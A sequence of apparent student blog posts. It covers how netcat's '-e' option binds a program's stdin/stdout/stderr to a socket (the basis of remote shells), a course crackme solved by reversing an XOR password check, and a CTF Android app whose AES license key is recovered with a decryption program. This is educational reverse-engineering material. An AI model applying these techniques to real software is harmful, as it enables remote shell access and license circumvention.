1/* Execute an external file making its stdin/stdout/stderr the actual socket */ 2 3staticvoidncexec(nc_sock_t*ncsock) 4{ 5intsaved_stderr; 6char*p; 7assert(ncsock&&(ncsock->fd>=0)); 8 9/* save the stderr fd because we may need it later */10saved_stderr=dup(STDERR_FILENO);1112/* duplicate the socket for the child program */13dup2(ncsock->fd,STDIN_FILENO);/* the precise order of fiddlage */14close(ncsock->fd);/* is apparently crucial; this is */15dup2(STDIN_FILENO,STDOUT_FILENO);/* swiped directly out of "inetd". */16dup2(STDIN_FILENO,STDERR_FILENO);/* also duplicate the stderr channel */1718/* change the label for the executed program */19if((p=strrchr(opt_exec,'/')))20p++;/* shorter argv[0] */21else22p=opt_exec;2324/* replace this process with the new one */25#ifndef USE_OLD_COMPAT26execl("/bin/sh",p,"-c",opt_exec,NULL);27#else28execl(opt_exec,p,NULL);29#endif30dup2(saved_stderr,STDERR_FILENO);31ncprint(NCPRINT_ERROR|NCPRINT_EXIT,_("Couldn't execute %s: %s"),32opt_exec,strerror(errno));33}/* end of ncexec() */
Here, on lines 13-16 is how the “-e” parameter really works. dup2() accepts
two file descriptors and after deallocating the second one (as if close()
was called on it), the second one’s value is set to the first. So in this
case on line 13, the child process’s stdin is being set to the file descriptor for the
network socket netcat opened. This means that the child process will view
any data received over the network will as input data and will act accordingly.
Then on lines 15 and 16, the stdout and stderr descriptors are also set to the
socket, which will cause any output the program has to be directed over the
network. As far as line 14 goes, I’m not sure why the original socket file descriptor
has to be closed at that exact point (and based on the comments, it seems like
the netcat author wasn’t sure either).
The main point is this file descriptor swapping has essentially
converted our specified program into a network service; all the input and output
will be piped over the network, and at this point the child process can
be executed. The child will replace the netcat process and will also inherit
the newly set socket file descriptors. Note that on lines 30 and 31 there’s
some error handling code that resets the original stderr for the netcat process
and prints out an error message. This is because the code should actually
never get to this point in execution due to the execl() call and if it does,
there was an error executing the child.
I wrote this little python program to see if I understood
things correctly:
We can see the “server” launched in the background. The echo command sends
data into netcat’s stdin, which is being sent over the network, handled by
the python script, which sends back its response, which gets printed. Then we
can see that the server exits since the netcat process has been replaced by
the script, and the script has exited.
As part of an Intro to Security course I’m taking, my professor gave us
a crackme style exercise to practice reading x86 assembly and basic
reverse engineering.
The program is pretty simple. It accepts a password as an argument and we’re
told that if the password is correct, “ok” is printed.
$ ./crackme
usage: ./crackme <secret>
$ ./crackme test
$
As usual, I start by running file on the binary, which shows that it’s a
standard x64 ELF binary. file also says that the binary is “not stripped”, which means
that it includes symbols. All I really know about symbols are that they can
include debugging information about a binary like function and variable names
and some symbols aren’t really necessary; they can be stripped out to reduce
the binary’s size and make reverse engineering more challenging. Maybe I’ll
do a more in depth post on this in the future.
$ file crackme
crackme: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=0x3fcf895b7865cb6be6b934640d1519a1e6bd6d39, not stripped
Next, I run strings, hoping to get lucky and find the password amongst the
strings in the binary. Strings looks for series of printable characters followed
by a NULL, but unfortunately nothing here works as the password.
Starting at the beginning, we see the stack pointer decremented as part of
the function prologue. The prologue is a set of setup steps involving
saving the old frame’s
base pointer on the stack, reassigning the base pointer to the current
stack pointer, then subtracting the stack pointer a certain amount to make room
on the stack
for local variables, etc. We don’t see the former two steps because this is
the main function so it doesn’t really have a function calling it, so saving/setting
the base pointer isn’t necessary.
Then the edi register is
compared to 1 and if it is less than or equal, we jump to offset 39.
Here at offset 39, we print something then jump to offset 34 where we repair
the stack (undo the sub instruction from the prologue) and return (ending
execution).
This is likely how the program checks the arguments and prints the usage
message if no arguments are supplied (which would cause argc/edi to be 1).
However if we supply an argument, edi is 0x2 and we move past the jle
instruction.
Here we can see the verify_secret function being called with a parameter
in rdi. This is most likely the argument we passed into the program. We can
confirm this with gdb (I’m using it with peda here).
Indeed rsi points to the first element of argv, so incrementing that by 8 bytes
(because 64 bit) points to argv[1], which is our input.
If we look after the verify_secret call we can see the program checks
if eax is 0 and if it is, jumps to offset 34, ending the program. However, if
eax is not zero, we’ll hit a puts call before exiting, which will presumably
print out the “ok” message we want.
I won’t walk through this one in detail because understanding each line
isn’t necessary to crack this. Let’s skip to
the memcmp call. If memcmp returns 0, eax is set to 1 and the function
returns. This is exactly what we want. From the man page, memcmp takes three
parameters, two buffers to compare and their lengths, and returns 0 if the
buffers are identical.
Here’s the setup to the memcmp call. We can see the third parameter for length
is the immediate 0x18 meaning the buffers will be 24 bytes in length. If we
examine address 0x600a80, we find this 24 byte string:
Since this is a direct address to some memory, we can be fairly certain that
we’ve found some sort of secret value! Based on the movzx eax,BYTE PTR [rdi]
instruction (offset 7)
which moves a byte from the input string into eax, the xor eax, 0xfffffff7
instruction (offset 36), and
the add rdi, 0x1 instruction (offset 54) which increments the char*
pointer to our input string, we can reasonably guess
that this function is xor'ing each character of our input with 0xf7 and writing
the result into a buffer which begins at rsp (also pointed to by rcx). Since
we now know the secret (\x91\xbf\xa4\x85...) and the xor key (0xf7) it’s
pretty easy to extract the password we need by xor'ing each byte of the secret
with the xor key.
This weekend I decided to try playing SU-CTF.
I’m pretty bad at CTF to be honest, so I was pretty thrilled to get
one of the 200 point challenges in the third (of five) difficulty tiers.
“Commerical Application!”
For this challenge, we’re given an Android application and the hint:
Flag is a serial number.
I installed it on my phone, here’s what it looks like:
I can tap on “Picture-01” and sliding to the right reveals this picture, but
if I try to tap on “Picture-02” or “Pictures-03” the app says I need to
enter a registration key. If I tap on the gear in the top right, I’m
prompted to enter my product key.
Running file reveals that .apk files are apparently just Zip archives,
so let’s try simply unzip‘ing it.
$ file suCTF.apk
suCTF.apk: Zip archive data, at least v2.0 to extract
$ unzip suCTF.apk
Archive: suCTF.apk
inflating: assets/db.db
inflating: res/color/abs__primary_text_disable_only_holo_dark.xml
inflating: res/color/abs__primary_text_disable_only_holo_light.xml
...
inflating: classes.dex
inflating: META-INF/MANIFEST.MF
inflating: META-INF/CERT.SF
inflating: META-INF/CERT.RSA
Cool! Now we have all the miscellaneous files that comprise the app. There’s
a database file, various .xml design files, and most interestingly, a
classes.dex file. .dex files contain bytecode run on the Android Dalvik VM, which
is currently the Java runtime for Android devices, so classes.dex likely
contains the code that runs the app, in compiled form. We can use the nifty
d2j-dex2jar utility for decompiling it into a classes-dex2jar.jar file. .jar
files are apparently also Zip archives, and we can again unzip it to extract
its contents.
This produces a TON of various .class files, but the most interesting lie
in the edu/sharif/ctf/ directory and are the compiled versions of the actual
code that makes up this app. We can use the jad tool to decompile these back
into Java source and start trying to reverse the product key.
There’s a directory in the app source called security/ and contains a file
called KeyVerifier.class that seems pretty promising. After decompiling it,
we find a KeyVerifier class with some pretty cool functions.
It’s pretty clear that isValidLicenceKey() is what processes the product key
prompt in the app. The encrypt() function shows us that the first paramter
s is the cleartext to be encrypted, the second parameter s1 is the AES
encryption key, and the last parameter s2 is the AES
initialization vector.
After doing a bit of grepping, I confirmed this by decompiling
activities/MainActivity.class and finding this code snippet:
publicvoidonClick(DialogInterfacedialoginterface,inti){if(KeyVerifier.isValidLicenceKey(userInput.getText().toString(),app.getDataHelper().getConfig().getSecurityKey(),app.getDataHelper().getConfig().getSecurityIv())){app.getDataHelper().updateLicence(2014);MainActivity.isRegisterd=true;showAlertDialog(context,"Thank you, Your application has full licence. Enjoy it...!");}else{showAlertDialog(context,"Your licence key is incorrect...! Please try again with another.");}}
With
this in mind, the code seems to AES encrypt the user input and check if it matches
a certain output. If we had the AES key and IV, we could decrypt the given
output and find the plaintext product key.
Tracing through the calls for the second and third parameters passed into
isValidLicense() I found that
the AES key and IV were stored in the assets/db.db SQLite database I noticed
earlier.
$ sqlite3 assets/db.db
...
sqlite> select * from config;
a b c d e f g h i
---------- ---------- ---------- ---------- ---------------- -------------------------------- ---------- -------------- ----------
1220140 a5efdbd57b84ca36 37eaae0141f1a3adf8a1dee655853714 1000 ctf.sharif.edu 9
There are no headers to the columns, but it is pretty obvious that the key
is the longer and the IV is the shorter of the “interesting strings” in the
database. For further confidence, I can verify this from the decompiled code
in db/DBHelper.class.
Using the key, IV and expected encrypted output, I wrote a simple decryption
program.
importjava.util.*;importjavax.crypto.Cipher;importjavax.crypto.spec.IvParameterSpec;importjavax.crypto.spec.SecretKeySpec;publicclassblah{// omitted for brevitypublicstaticStringbytesToHexString(byteabyte0[]){...}publicstaticbyte[]hexStringToBytes(Strings){...}publicstaticStringdecrypt(Strings,Strings1,Strings2){SecretKeySpecsecretkeyspec=newSecretKeySpec(hexStringToBytes(s1),"AES");Ciphercipher=null;byte[]key=null;try{cipher=Cipher.getInstance("AES/CBC/PKCS5Padding");cipher.init(Cipher.DECRYPT_MODE,secretkeyspec,newIvParameterSpec(s2.getBytes()));key=cipher.doFinal(hexStringToBytes(s));}catch(Exceptione){e.printStackTrace();}returnnewString(key);}publicstaticvoidmain(Stringargs[]){Stringe="29a002d9340fc4bd54492f327269f3e051619b889dc8da723e135ce486965d84";Stringiv="a5efdbd57b84ca36";Stringkey="37eaae0141f1a3adf8a1dee655853714";System.out.println(decrypt(e,key,iv));}}